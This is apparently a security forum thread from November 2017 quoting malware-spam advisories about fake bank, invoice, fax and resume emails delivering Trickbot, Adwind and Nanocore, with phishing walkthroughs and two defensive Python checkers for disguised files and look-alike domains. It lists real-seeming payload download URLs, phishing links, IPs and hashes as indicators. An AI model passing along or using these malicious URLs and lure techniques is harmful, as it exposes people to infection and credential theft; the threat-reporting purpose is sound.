Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/11/You-have-received-a-fax-message_8_nov_17.png

faxmessage*** .ml is being hosted on different IP numbers & ranges all appearing to be -compromised- ISP IP numbers from major ISPs in UK, Europe & USA. In previous phishing and malware scams by this criminal gang they used a range of domain numbers between 1 and 600 over several days, so there could be a lot more to come.

efax1298357237174_23536.doc - Current Virus total detections 5/60*. Payload Security**
This malware doc file downloads using PowerShell from
http ://transfercar24 .de/xjersey/grondbag.png which of course is -not- an image file but a renamed .exe file that gets renamed to slaaen.exe (VirusTotal 18/67***)
Alternative download site:
http ://theartofinvestment .co.uk/authentic/grondbag.png
The word doc looks like:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/08/efax42542153_2425_doc.png
... DO NOT follow the advice they give to enable macros or enable editing to see the content..."
* https://www.virustotal.com/en/file/7f50019f5e83818af3e8da4c03e676320c4c3edb3efcdca4225892a928161e2a/analysis/1510147039/
efax1298357237174_23536.doc

** https://www.hybrid-analysis.com/sample/7f50019f5e83818af3e8da4c03e676320c4c3edb3efcdca4225892a928161e2a?environmentId=100

*** https://www.virustotal.com/en/file/cd91143d8634199004677c14fd1919b8cf01397979e9839f5325d8beade1609b/analysis/1510152607/
grondbag.png.exe

transfercar24 .de: 87.106.3.106: https://www.virustotal.com/en/ip-address/87.106.3.106/information/
> https://www.virustotal.com/en/url/b8364d93faa6a9d87b467c136ee555b7db825c88fbecf865055676dd92d0bbd0/analysis/

theartofinvestment .co.uk: ... A temporary error occurred during the lookup...
___

Drive-by cryptocurrency mining
> https://www.helpnetsecurity.com/2017/11/08/drive-by-cryptocurrency-mining/
Nov 8, 2017

(MANY details at the URL above.)

:fear::fear: :mad:

AplusWebMaster
2017-11-10, 17:03
FYI...

Fake 'Resume' SPAM - delivers malware
- https://myonlinesecurity.co.uk/fake-resume-emails-continue-to-deliver-malware/
10 Nov 2017 - "... This is a continuation from these 2 previous posts about malware using resumes or job applications as the lure [1] [2]...
1] https://myonlinesecurity.co.uk/website-job-application-fake-resume-delivers-globe-ransomware/
2] https://myonlinesecurity.co.uk/spear-phishing-fake-resume-malspam-leads-to-malware/
... you can see from the email headers, these pass all authentication checks, so stand quite a good chance of being delivered to a recipient... the web address the word doc downloads from
http ://89.248.169.136 /bigmac.jpg is exactly the same as reported on 8th October 2017. More than 1 month ago & still live and spewing out malware...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/11/resume_amir.png

resume.doc - Current Virus total detections 11/59*. Payload Security**...
This malware downloads from http ://89.248.169.136 /bigmac.jpg which of course is -not- an image file but a renamed .exe ASDlkoa.exe (VirusTotal 18/67[3]) (Payload Security[4])... This word doc looks like this:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/10/resume_doc.png
... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/0af97621951ce1fc64f8d1d7c6122aabba73ea0e6c90acb2e51c7f3f4c658f44/analysis/1510290607/
resume.doc

** https://www.hybrid-analysis.com/sample/0af97621951ce1fc64f8d1d7c6122aabba73ea0e6c90acb2e51c7f3f4c658f44?environmentId=100
Hybrid Analysis
89.248.169.136: https://www.virustotal.com/en/ip-address/89.248.169.136/information/
> https://www.virustotal.com/en/url/880e2bbcd2a5e019f843cb714639b8382c5ad781f182ea7afa5556f7262f8f9e/analysis/

3] https://www.virustotal.com/en/file/43ade0732b103beef40c9c65dfe7854c5b29ff274fc8d5bfe954a2564f4d6396/analysis/1510290556/
ASDlkoa.exe

4] https://www.hybrid-analysis.com/sample/43ade0732b103beef40c9c65dfe7854c5b29ff274fc8d5bfe954a2564f4d6396?environmentId=100
___

Fake 'MoneyGram' SPAM - Java Adwind delivered
- https://myonlinesecurity.co.uk/java-adwind-delivered-via-fake-moneygram-notice-again/
10 Nov 2017 - "... mentioned many of these HERE[1]. We have been seeing these sort of emails almost every day and there was nothing much to update. Today’s has a slightly different subject and email content to previous ones. Many Antiviruses on Virus Total normally detect these heuristically...
1] https://myonlinesecurity.co.uk/?s=java+adwind
Make Note: JavaAdwind/JavaJacksbot are both very dangerous remote access backdoor Trojans...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/11/Moneygram-Notice-1110_2017.png

There is -no-attachment- with this malspam campaign, but instead a -link- that activates when you click the image in the email, which downloads
http ://ferraniguillem .com/MG%20Notice%201110.zip which is NOT a .zip but a .rar file. It will not extract until you -rename- it to rar and then only in WinZip -not- in any other of my extraction tools... eventually extracts to:
MG Notice 1110.JAR (532kb) Current Virus total detections 15/58*. Payload Security**...
The basic rule is NEVER open any attachment or link in an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/2367b6471df8adc26dfb902e3f0c1b45998a0e0dbb28d22b56e1ca2c421181f3/analysis/1510301644/
MG Notice 1110.JAR

** https://www.hybrid-analysis.com/sample/2367b6471df8adc26dfb902e3f0c1b45998a0e0dbb28d22b56e1ca2c421181f3?environmentId=100

ferraniguillem .com: 82.98.139.51: https://www.virustotal.com/en/ip-address/82.98.139.51/information/
> https://www.virustotal.com/en/url/0317cb29f4301f3fed3562109236bbcd4d08da6260b8d01f4595a9279c49b12d/analysis/
___

Fidelity Investments – Phish...
- https://myonlinesecurity.co.uk/fake-fidelity-investments-important-security-notice-phishing/
10 Nov 2017 - "... one we don’t often see in the UK. Fidelity Investments is a US based bank or institution...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/11/fidelity_phishing-scam-email.png

If you follow the link-in-the-email
http ://www.meyvesebze .net/wp-content/plugins/p.php which -redirects- you to
https ://www.todentists .ca/Site/styles/RtlCust/IdentifyUser/login.php?cmd=login_submit&id=e992ab62da234424f3975ad9356b4929e992ab62da234424f3975ad9356b4929&session=e992ab62da234424f3975ad9356b4929e992ab62da234424f3975ad9356b4929
... you see a webpage looking like this:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/11/to_dentists_fidelity_phishing.png

After you input your User Name and Password, you get forwarded to a page asking for Social security number, Date of Birth, Email Address and Email Password:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/11/to_dentists_fidelity_phishing2.png

Then you get a failure page saying “Due to a technical error, the update system is temporarily unavailable. We apologize for the inconvenience. Please try again later”:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/11/to_dentists_fidelity_phishing3.png

... Watch for -any- site that invites you to enter ANY personal or financial information... All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... Email Headers and phishing Site information: the From address in the email does-not-exist and is totally made up..."

meyvesebze .net: 31.186.8.167: https://www.virustotal.com/en/ip-address/31.186.8.167/information/

todentists .ca: 64.118.86.45: https://www.virustotal.com/en/ip-address/64.118.86.45/information/

:fear::fear: :mad:
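Several of the reports above turn on the same trick: a Windows executable served as a .png or .jpg, a RAR archive named as a .zip, or a document word buried in the file name (Bank receipt pdf.exe). The check below is an added example, not code from the quoted blog posts; it sniffs the leading bytes of a file and compares them with what the name claims. The sample byte strings are constructed stand-ins, not real samples.

```python
"""Check whether a downloaded file's content matches what its name claims."""
import os
import re
from typing import Optional

# (magic bytes at offset 0, type name)
MAGIC = [
    (b"MZ", "pe"),                                 # DOS/PE executable header
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"\xff\xd8\xff", "jpeg"),
    (b"%PDF-", "pdf"),
    (b"Rar!\x1a\x07", "rar"),                      # RAR4 (..00) and RAR5 (..01 00)
    (b"PK\x03\x04", "zip"),                        # plain zip, .docx/.xlsx, .jar
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "ole"),  # legacy .doc/.xls (OLE2/CFB)
]

# Content types that legitimately appear behind each extension.
EXPECTED = {
    ".png": {"png"}, ".jpg": {"jpeg"}, ".jpeg": {"jpeg"}, ".pdf": {"pdf"},
    ".zip": {"zip"}, ".jar": {"zip"}, ".docx": {"zip"}, ".xlsx": {"zip"},
    ".rar": {"rar"}, ".doc": {"ole"}, ".xls": {"ole"},
    ".exe": {"pe"}, ".dll": {"pe"}, ".scr": {"pe"},
}
# Words that suggest a document type when they appear in the name stem.
DOCUMENT_WORDS = {"pdf", "doc", "docx", "xls", "jpg", "png", "zip", "txt"}


def sniff(data: bytes) -> Optional[str]:
    """Return the type name implied by the leading bytes, or None if unknown."""
    for sig, name in MAGIC:
        if data.startswith(sig):
            return name
    return None


def check_file(name: str, data: bytes) -> dict:
    """Compare sniffed content type with the extension and name of a file."""
    stem, ext = os.path.splitext(name)
    ext = ext.lower()
    actual = sniff(data)
    expected = EXPECTED.get(ext)
    if actual is None:
        verdict = "unknown-content"
    elif expected is None:
        verdict = "unknown-extension"
    elif actual in expected:
        verdict = "match"
    else:
        verdict = "mismatch"  # e.g. PE bytes behind .png, RAR behind .zip
    # A document word inside the stem ("Bank receipt pdf.exe") is the
    # double-extension trick: only the last extension counts.
    decoy = any(tok.lower() in DOCUMENT_WORDS for tok in re.split(r"[\s._-]+", stem))
    return {
        "name": name,
        "extension": ext,
        "actual": actual,
        "verdict": verdict,
        # An executable is disguised whenever the name does not admit to it.
        "executable_disguised": actual == "pe" and ext not in (".exe", ".dll", ".scr"),
        "decoy_in_name": decoy,
    }


# Constructed stand-ins: only the leading bytes matter for this check.
SAMPLE_PE = b"MZ\x90\x00\x03\x00" + b"\x00" * 58
SAMPLE_RAR = b"Rar!\x1a\x07\x01\x00" + b"\x00" * 16
SAMPLE_PNG = b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR"

if __name__ == "__main__":
    for n, d in [("ser1107.png", SAMPLE_PE), ("MG Notice 1110.zip", SAMPLE_RAR),
                 ("Bank receipt pdf.exe", SAMPLE_PE), ("logo.png", SAMPLE_PNG)]:
        print(check_file(n, d))
```

A mail gateway or proxy can run the same comparison on attachments and downloads before the user ever sees a file name; the verdict "mismatch" with executable_disguised set is the case every post above describes.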

AplusWebMaster
2017-11-13, 14:52
FYI...

Fake 'Sage invoice' SPAM - delivers Trickbot
- https://myonlinesecurity.co.uk/fake-sage-invoices-continue-to-deliver-trickbot-banking-trojan/
13 Nov 2017 - "An email with the subject of 'Important: Outdated Invoice' pretending to come from Sage but actually coming from a look-a-like or typo-squatted domain <secure@ sage-invoices .com> with a malicious word doc attachment... delivering Trickbot banking Trojan... Today’s examples of the spoofed domains are, as usual, registered via Godaddy as registrar.
sage-invoices .com hosted on 185.2.81.187 | 213.152.162.139 | 185.106.121.134 |

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/11/sage-important-outdated-invoice.png

SecureMessage.doc - Current Virus total detections 2/60*. Payload Security**...
This malware file downloads from
http ://styleof .co.uk/ser1113.png which of course is -not- an image file but a renamed .exe file that gets renamed to yjgeidqce.exe (VirusTotal 11/66***)
An alternative download location is
http ://rifweb .co.uk/ser1113.png
This email attachment contains a genuine word doc with a macro script that when run will infect you.
The word doc looks like:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/11/76sagepay_doc.png
... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/345f2734e5d25a5ccee9c52b61d3a815125db501bd187d9772fadfb0c2dc1f92/analysis/
76SagePay.doc

** https://www.hybrid-analysis.com/sample/345f2734e5d25a5ccee9c52b61d3a815125db501bd187d9772fadfb0c2dc1f92?environmentId=100

*** https://www.virustotal.com/en/file/2afef18845aa3c1a76f74b1c9ac35e93e93e79c584b6a87e5204608f2d2c05a8/analysis/1510574768/
ser1113.png

styleof .co.uk: 79.171.39.110: https://www.virustotal.com/en/ip-address/79.171.39.110/information/
> https://www.virustotal.com/en/url/471e77862ec045236f8d2d3eec3faf89a608126b8e150310d44f08cbe380bbc8/analysis/

rifweb .co.uk: 217.194.212.248: https://www.virustotal.com/en/ip-address/217.194.212.248/information/
> https://www.virustotal.com/en/url/147f0c6edd137ffbce46719ab6b13aa40653273ded7b5c9350f56a3810bc3ea5/analysis/

:fear::fear: :mad:

AplusWebMaster
2017-11-14, 12:41
FYI...

Fake 'Secure email' SPAM - delivers Trickbot
- https://myonlinesecurity.co.uk/trickbot-still-delivered-by-fake-lloyds-bank-important-confidential-documents-malspam/
14 Nov 2017 - "An email with the subject of 'Secure email message' pretending to come from Lloyds Bank but actually coming from... look-a-like or typo-squatting domains and email addresses <secure@ lloydsconfidential .com>
or <secure@ lloydsbankdocs .com> or <secure@ lloydsbankconfidential .com> with a malicious word doc attachment is today’s latest -spoof- of a well-known company, bank or public authority delivering Trickbot banking Trojan...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/11/Important-Confidential-documents-Lloyds-Bank.png

Despite the instructions in the email to use the Authorisation code in the word doc, there is nowhere to enter it and it is not needed. The criminals are relying on you being fooled by this simple Social Engineering trick persuading you to enable Macros and content to infect you & steal your Money, Passwords and Bank details.
They tell you “Note: Contents of this document are protected and secured. If you have problems viewing/loading secure content, please select ‘Enable Content’ button.”
Do -NOT- enable Macros or Content under any circumstances. That will infect you...

Today’s examples of the -spoofed- domains are, as usual, registered via Godaddy as registrar.
lloydsconfidential .com hosted on and sending emails via 185.106.121.78
free.hostsailor .com AS60117 Host Sailor Ltd.
lloydsbankconfidential .com hosted on and sending emails via 95.211.104.108 hosted-by.swiftslots .com
AS60781 LeaseWeb Netherlands B.V.
lloydsbankdocs .com hosted on and sending emails via 134.19.180.151 134191801511.onlinemarketmix .com AS49453 Global Layer B.V.

doc1_46.doc - Current Virus total detections 3/59*. Payload Security**...
This malware file downloads from
http ://simplicitybystrasser .com/images/logo.png which of course is -not- an image file but a renamed .exe file that gets renamed to a .exe file. (VirusTotal 9/68***).
An alternative download location is
http ://lhelectrique .com/logo.png
This email attachment contains a genuine word doc with a macro script that when run will infect you.

The word doc looks like:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/11/doc1_46_doc.png

DO NOT follow the advice they give to enable macros or enable editing to see the content..."
* https://www.virustotal.com/en/file/de17dfbad569dac86a952b993f3df27d993e991f5189af002c883103d94d8b9e/analysis/1510661006/
doc1_46.doc

** https://www.hybrid-analysis.com/sample/de17dfbad569dac86a952b993f3df27d993e991f5189af002c883103d94d8b9e?environmentId=100

*** https://www.virustotal.com/en/file/4cd32733722c4f8fa7993fb6bc997c8dbd1129678c427579774c99bef668e952/analysis/
logo.png

simplicitybystrasser .com: 23.235.209.96: https://www.virustotal.com/en/ip-address/23.235.209.96/information/
> https://www.virustotal.com/en/url/f4699e6adac225e3f9c87b12629d4e8fa1da929cbe6a6ced8d6830be4a365de7/analysis/

lhelectrique .com: 173.209.38.131: https://www.virustotal.com/en/ip-address/173.209.38.131/information/
> https://www.virustotal.com/en/url/3a438ad85528c1313c921cb3805b9cfbd7ba61de1b01de087826b8c758ee7a81/analysis/
___

Fake 'Bank login' - Phish...
- https://myonlinesecurity.co.uk/fake-halifax-we-noticed-an-attempt-to-sign-in-to-your-account-phishing/
14 Nov 2017 - "... phishing attempts for Bank login details. This one is actually quite effective when you get to the site. As you can see from the screenshots, it is very easy to be fooled by the
http ://www.halifax-online .co.uk.personal.logon.login.jsp at the start of the URL in the browser address bar
(Highlighted in Yellow) where the real web address you are sent to is lifextension .ro (Highlighted in Green)...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/11/halifax_phish_email_14_nov_2017.png

... If you follow the-link-inside-the-email you first get sent to
https ://superjasa .com/wp-admin/js/widgets/x86x.php which immediately redirects you to
http ://www.halifax-online .co.uk.personal.logon.login.jsp.1510638768542.lifextension .ro/RT28JASHHDAS02/Login.php?sslchannel=true&sessionid=WR3WM0KHcrFBC45ugtRa7iFomyQGXFz5fraRrou3vd4QceX3svWxy82f4JzNRFdeGOjHnwfj5iI0UJ2T

where you see a webpage looking like this:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/11/halifax_phish_site_lifextension.ro_.png

... Both sites involved in this phish are likely to be -compromised- sites, being used without the website owners’ knowledge
http ://lifextension .ro - 76.72.173.69: https://www.virustotal.com/en/ip-address/76.72.173.69/information/

There is a message on the home page for lifextension .ro warning that the hosting agreement for this page has expired, but the hosts/resellers have only put that on the home page -not- on any subdomains, so the phish stays active... the DCM software “company” is a webdesigner and hosting reseller, who aren’t taking security of their clients’ sites seriously enough. By the layout and design of their own website they must think of style over substance and that mistakes and errors don’t matter (various missing & broken links, including social media buttons going nowhere):
- https://myonlinesecurity.co.uk/wp-content/uploads/2017/11/lifextension_ro.png

> https://www.virustotal.com/en/url/313cfe502aaf5f0f1cde386bb41d08723ea2b437aabcb3918ae9245155fdca0b/analysis/

Has a malware prompt on its home page, luckily the file is hosted-on-Dropbox & no longer available for download.

superjasa .com: 202.52.146.30: https://www.virustotal.com/en/ip-address/202.52.146.30/information/

:fear::fear: :mad:
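The Halifax phish above relies on the reader seeing "halifax-online.co.uk" at the start of the address bar and not noticing that the registrable domain is lifextension.ro, while the Trickbot senders register look-alike domains (lloydsbankdocs.com, barclaysmail.co.uk, efax-secure.com, faxmessage***.ml) that carry the brand in the domain itself. The classifier below is an added example, not code from the quoted blog posts; it separates those two cases by first finding the registrable domain. Its suffix list and brand allow-list are small constructed subsets assumed for illustration, not a full Public Suffix List or a complete list of the banks' domains.

```python
"""Tell where a brand name really sits in a hostname: in the registrable
domain the sender controls, or only in subdomain labels placed in front of it."""
import re
from urllib.parse import urlsplit

# Constructed subset of the Public Suffix List: two-label registry suffixes,
# under which the registrable domain is one label longer (barclaysmail.co.uk).
MULTI_LABEL_SUFFIXES = {"co.uk", "org.uk", "ac.uk", "com.au", "co.nz", "co.za"}

# Assumed allow-list for illustration: brand keyword -> domains the brand really uses.
BRAND_DOMAINS = {
    "halifax": {"halifax.co.uk", "halifax-online.co.uk"},
    "barclays": {"barclays.co.uk", "barclays.com"},
    "lloyds": {"lloydsbank.com", "lloydsbank.co.uk"},
    "efax": {"efax.com", "efax.co.uk"},
    "sage": {"sage.com", "sage.co.uk"},
}

# Serial throw-away domains of the faxmessage1.ml ... faxmessage599.ml kind.
SERIAL_DOMAIN = re.compile(r"^[a-z-]+\d{1,3}\.[a-z]+$")


def registrable_domain(host: str) -> str:
    """Return the part of the hostname a registrant actually controls."""
    labels = host.lower().rstrip(".").split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in MULTI_LABEL_SUFFIXES:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def _mentions(brand: str, text: str) -> bool:
    """True if a label token starts with the brand. Matching on token start
    avoids false hits such as 'sage' inside 'faxmessage'."""
    return any(tok.startswith(brand) for tok in re.split(r"[-.\d]+", text) if tok)


def classify_host(host: str) -> dict:
    host = host.lower().rstrip(".")
    reg = registrable_domain(host)
    # Everything in front of the registrable domain is sender-chosen decoration.
    prefix = host[: len(host) - len(reg)].rstrip(".")
    result = {"host": host, "registrable": reg, "brand": None, "verdict": "no-brand",
              "serial_pattern": bool(SERIAL_DOMAIN.match(reg))}
    for brand, legit in BRAND_DOMAINS.items():
        if reg in legit:
            result.update(brand=brand, verdict="legitimate")
            return result
        if _mentions(brand, reg):
            # barclaysmail.co.uk: brand baked into a domain the bank does not own.
            result.update(brand=brand, verdict="lookalike-domain")
            return result
        if _mentions(brand, prefix):
            # www.halifax-online.co.uk.personal....lifextension.ro: brand only
            # appears in subdomain labels of someone else's domain.
            result.update(brand=brand, verdict="brand-in-subdomain")
            return result
    return result


def classify_url(url: str) -> dict:
    """Apply classify_host to the hostname of a URL (userinfo and path ignored)."""
    return classify_host(urlsplit(url).hostname or "")


if __name__ == "__main__":
    for h in ["www.halifax-online.co.uk.personal.logon.login.jsp.1510638768542.lifextension.ro",
              "barclaysmail.co.uk", "message.efax-secure.com", "faxmessage123.ml",
              "www.halifax-online.co.uk"]:
        print(classify_host(h))
```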

AplusWebMaster
2017-11-15, 16:20
FYI...

Fake 'Bankline' SPAM - delivers Trickbot
- https://myonlinesecurity.co.uk/fake-bankline-you-have-a-new-secure-message-spam-delivers-trickbot-banking-trojan/
15 Nov 2017 - "An email with the subject of 'You have a new secure message' pretending to come from Bankline but actually coming from a look-a-like or typo-squatting domain <message@ banklinemail .com> with a link-in-the-email body to download a malicious word doc attachment is today’s latest spoof of a well-known company, bank or public authority delivering Trickbot banking Trojan
Today the Trickbot delivery method has changed somewhat. First, they have a link-in-the-email body to download a word doc. Next they have gone with a generic Bankline sender and domain. There are several banks using the Bankline name, including RBS (Royal Bank of Scotland), NatWest, Ulster Bank and a Bitcoin-Bank-Account called Bankline... no idea which one they are trying to imitate today but it cleverly covers all of them & spreads the net wider than usual. There is also only 1 download location for the Trickbot payload today, they normally have 2. It looks like they have messed up the PowerShell script that gets created by the macro and the 2nd url isn’t being formed correctly...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/11/bankline-new-secure-message.png

Today’s examples of the spoofed domains are, as usual, registered via Godaddy as registrar.
banklinemail .com hosted on 160.153.129.238 Godaddy AS26496 but also sending emails via 185.106.121.234 | 95.211.104.113 | 46.21.144.11 | 134.19.180.163 | all of which pass authentication and have correct records set.
Despite the instructions in the email to use the Authorisation code in the word doc, there is nowhere to enter it and it is not needed. The criminals are relying on you being fooled by this simple Social Engineering trick persuading you to 'enable Macros' and content to infect you & steal your Money, Passwords and Bank details.
They tell you “Note: Contents of this document are protected and secured. If you have problems viewing/loading secure content, please select ‘Enable Content’ button.”
Do NOT enable Macros or Content under any circumstances. That will infect you.

8d6ba737-775e8bdc-f95f16f3-1b460259.doc - Current Virus total detections 2/59*. Payload Security**...
This malware file downloads from
http ://aperhu .com/ser111517.png which of course is -not- an image file but a renamed .exe file that gets renamed to tdhq.exe (VirusTotal 11/59***).
This email attachment contains a genuine word doc with a macro script that when run will infect you.
The word doc looks like:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/11/8d6ba737-775e8bdc-f95f16f3-1b460259_doc.png
... DO NOT follow the advice they give to enable macros or enable editing to see the content..."
* https://www.virustotal.com/en/file/5da72367078fdea770d0df1975f52432439bd760c8395f44ed31e9f4e65ea6dc/analysis/1510740562/
Secure Message.doc

** https://www.hybrid-analysis.com/sample/5da72367078fdea770d0df1975f52432439bd760c8395f44ed31e9f4e65ea6dc?environmentId=100

*** https://virustotal.com/en/file/efa4fdfa1a1df3ae13aa352ec1d6fdc1b6c000790a5dc5a2700469bf5af57e8d/analysis/
ser111517.png

aperhu .com: 143.95.252.46: https://www.virustotal.com/en/ip-address/143.95.252.46/information/
> https://www.virustotal.com/en/url/9227e8a7b041b317b7abd39fc7e297413188e4e9f2cd732e65b89a34eda17e8c/analysis/
___

Android Trojan malware discovered in Google Play
- https://blog.malwarebytes.com/cybercrime/2017/11/new-trojan-malware-discovered-google-play/
Nov 14, 2017 - "A new piece of mobile malware has been discovered in Google Play masquerading as multiple apps: an alarm clock app, a QR scanner app, a compass app, a photo editor app, an Internet speed test app, and a file explorer app. According to Google Play data, all were last updated between October and November 2017. These dates are likely when they were added to Google Play, based on their low version numbers (e.g. 1.0, 1.0.1). We named this new malware variant Android/Trojan.AsiaHitGroup based on a URL found within the code of these malicious APKs...
this QR scanner is short lived. You only get one chance to use the app, because after clicking out of it, the icon disappears! Out of frustration, you may immediately go to your apps list to uninstall this bizarre-behaving QR scanner, but good luck finding it... there appears to be no fail-proof way to stop malware from entering the Play store. This is where a second layer of protection is strongly recommended. By using a quality mobile anti-malware scanner, you can stay safe even when Google Play Protect fails..."
(More detail at the malwarebytes URL above.)

> https://www.helpnetsecurity.com/2017/11/16/malware-downloader-google-play/
Nov 16, 2017 - "Google has removed from Google Play eight apps that have served as downloaders for Android banking malware..."

:fear::fear: :mad:

AplusWebMaster
2017-11-16, 15:39
FYI...

Suspicious Domains Tracking ...
- https://isc.sans.edu/diary/rss/23046
2017-11-16 - "Domain names remain a gold mine to investigate security incidents or to prevent some malicious activity to occur on your network...
Happy hunting!
[1] https://isc.sans.edu/suspicious_domains.html
[2] https://en.wikipedia.org/wiki/Domain_generation_algorithm
[3] http://securityaffairs.co/wordpress/59072/cyber-crime/wannacry-ransomware-kill-switch.html
[4] http://misp-project.org/
[5] https://blog.rootshell.be/2017/10/31/splunk-custom-search-command-searching-misp-iocs/ "

(MUCH more detail at the isc URL above.)

:2thumb:
___

Fake 'Re:payment' SPAM - delivers malware
- https://myonlinesecurity.co.uk/fake-confirm-receipt-of-payment-malspam-delivers-malware/
16 Nov 2017 - "An email with the subject of 'Re:payment' coming from [redacted]@ cs .com with a zip attachment which contains some sort of malware...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/11/payment_cs_com.png

Bank receipt pdf.zip: Extracts to: Bank receipt pdf.exe - Current Virus total detections 15/68*. Hybrid Analysis**...
This malware file attempts to download from these -3- sites:
http ://www.plasticbags .info/na/?id=ct7EX847F+fIn3VkER7xV/XU/exdWHV6LvmrngXmar4Pbag2la+n0AnpQnxVHV21Mp6i4Q==&Lv18=bLUdWtwp4bJhJP -or-
http ://www.nettopolis .email/na/?id=DetlfAibiVhB/jSD5CdGOk3sftJHeNpzwT01DHDpstch9neoK+a+bAVv0IXcSJ5QPSyr6g==&Lv18=bLUdWtwp4bJhJP
-both- of which fail to respond. Both sites are hosted on Godaddy (184.168.221.53) and have a temporary holding / domain parking page with the usual adverts. Both sites were registered in early September 2017. Either Godaddy has exploitable vulnerabilities on their Domain Parking pages or they were registered by criminals who haven’t set up the domains properly yet.
http ://www.marlow-and-co .com/na/?id=mLSZLOZGg8XOoWhtThKSW1hFX7QHeHYwxlPs7+FwgoIusw3OZOrPJE6119RFPiuJf6vG8Q==&Lv18=bLUdWtwp4bJhJP&sql=1
which is hosted in Japan (183.90.253.3) and gives a 404...
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/7ce1b57fd10cbd38bb791fa6c9ef4d1f6b5d2beffcc9131385ef87552f863a97/analysis/1510806654/

** https://www.hybrid-analysis.com/sample/7ce1b57fd10cbd38bb791fa6c9ef4d1f6b5d2beffcc9131385ef87552f863a97?environmentId=100
File Details
Bank receipt pdf.exe
DNS Requests
No relevant DNS requests were made.
Contacted Hosts
No relevant hosts were contacted...

plasticbags .info: 50.63.202.62: https://www.virustotal.com/en/ip-address/50.63.202.62/information/

nettopolis .email: 184.168.221.53: https://www.virustotal.com/en/ip-address/184.168.221.53/information/

marlow-and-co .com: 183.90.253.3: https://www.virustotal.com/en/ip-address/183.90.253.3/information/
___

Fake 'Confidential account documents' SPAM - delivers Trickbot
- https://myonlinesecurity.co.uk/fake-barclays-confidential-account-documents-malspam-delivers-trickbot-banking-trojan/
16 Nov 2017 - "An email with the subject of 'Confidential account documents' pretending to come from Barclays Bank but actually coming from a look-a-like or typo-squatted domain <secure@ barclaysdocuments .com> with a malicious word doc attachment is today’s latest spoof of a well-known company, bank or public authority delivering Trickbot banking Trojan. The attachment has random numbers protected**.doc ...
Today’s examples of the spoofed domains are, as usual, registered via Godaddy as registrar.
barclaysdocuments .com hosted on and emails sent via 134.19.180.171 | 94.100.21.212 | 185.117.74.216 | 94.75.219.142 |

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/11/barclays-confidential-account-documents.png

Protected80.doc - Current Virus total detections 5/55*. Payload Security**...
This malware file downloads from
http ://simplicitybystrasser .com/images/ser.png which of course is -not- an image file but a renamed .exe file that gets renamed to Aqv6.exe (VirusTotal 10/68***).
This email attachment contains a genuine word doc with a macro script that when run will infect you.
The word doc looks like:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/11/protected80_doc.png
... You -cannot- enter the password because that is an-image of a password-entry-box and they hope you will enable the macros (DON'T) ... and get infected...
DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/406047bbbad09cafeb623eb2c1057441ae6db7f19f630acf9a02f9c48e7f40a7/analysis/1493724795/
SecureMessage.doc

** https://www.hybrid-analysis.com/sample/406047bbbad09cafeb623eb2c1057441ae6db7f19f630acf9a02f9c48e7f40a7?environmentId=100

*** https://www.virustotal.com/en/file/a3f31216ce813cafc0288bd53bcdd68919f87e6f3ff354e40c1ea4169ef3183a/analysis/1510840036/
Aqv6.exe

simplicitybystrasser .com: 23.235.209.96: https://www.virustotal.com/en/ip-address/23.235.209.96/information/
> https://www.virustotal.com/en/url/86af85c833e2b8437de460e1b255e8cc54431f9312a3290c81f6608713ffb00f/analysis/

:fear::fear: :mad:

AplusWebMaster
2017-11-17, 15:18
FYI...

Fake 'Product Enquiry' SPAM - delivers Nanocore RAT
- https://myonlinesecurity.co.uk/fake-product-enquiry-malspam-delivers-nanocore-rat/
17 Nov 2017 - "An email with the subject of 'Product Enquiry' pretending to come from Robert Osuna Sales <roberto. osuna76@mail .com> with a malicious Excel XLS spreadsheet attachment delivers NanoCore Remote Access Trojan...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/11/osuna_product_enquiry.png

These are actually coming via an automated mailing service based in Russia, who despite sending malware are complying with the various anti-spam laws worldwide by having an unsubscribe link in the email body. I do not recommend using the -unsubscribe- link. That is an almost guaranteed way to get your email address added to a load more spam and malware lists. The blurry image in the XLS spreadsheet is a Social Engineering trick to persuade you to enable editing & content (macros) so they can infect you.
DO NOT enable Editing or Content (macros) under any circumstances:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/11/product-enquiry_xls.png

Product Enquiry.xls - Current Virus total detections 14/61*. Hybrid Analysis**...
This malware downloads from
http ://cryptovoip .in/awedfs/DDF_outputCEAA78F.exe (VirusTotal 18/68[3]) (Hybrid Analysis[4])...
Email Headers and malware sites details:
191.96.249.92 - smtp4.digitalsearchengine .in - Moscow...
balajipacker .com registered 27/09/2017 using Godaddy as registrar hosted on 191.96.249.92
